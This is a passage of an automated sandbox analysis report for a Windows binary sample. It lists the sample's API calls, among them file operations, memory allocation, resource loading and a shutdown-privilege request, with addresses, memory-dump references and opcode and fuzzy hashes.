                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1948546556-0
                                                                                                      • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                      • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                      • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                      • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

                                                                                                      Control-flow Graph
                                                                                                      control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021A03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156039329-0
                                                                                                      • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                      • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                                      • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                      • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 2087232378-0
                                                                                                      • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                      • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                      • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                      • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                      APIs
                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                                        • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                                        • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1658689577-0
                                                                                                      • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                                      • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                                                      • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                                      • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                      • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                                      • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                      • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                      • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                                      • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                      • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
• Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
• Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
• Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021A03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
• Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
• Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
• Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
• Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
• Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
• Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
• Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
• Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
APIs
• SetEndOfFile.KERNEL32(?,021C4000,0040A08C,00000000), ref: 004076B3
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021A03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: ErrorFileLast
• String ID:
• API String ID: 734332943-0
• Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
• Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
• Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
• Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
• Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
• Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
• Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
• Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
APIs
• CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: CharPrev
• String ID:
• API String ID: 122130370-0
• Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
• Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
• Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
• Instruction Fuzzy Hash:
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
• Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
• Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
• Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
APIs
• VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
• Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
• Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
• Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
APIs
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
• Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
• Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
• Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
Memory Dump Source
• Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
• Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
• Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
• Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                                                      • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                      • API String ID: 107509674-3733053543
                                                                                                      • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                      • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                      • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                      • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                                                      • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                                                      • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                      • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                                                      • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                      • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                                                      APIs
                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                                      • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                                                      • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                                      • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                                                      APIs
                                                                                                      • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: SystemTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 2656138-0
                                                                                                      • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                      • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                                      • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                      • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                                      APIs
                                                                                                      • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.3287546015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.3287511555.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287572082.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.3287599303.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Version
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889659487-0
                                                                                                      • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
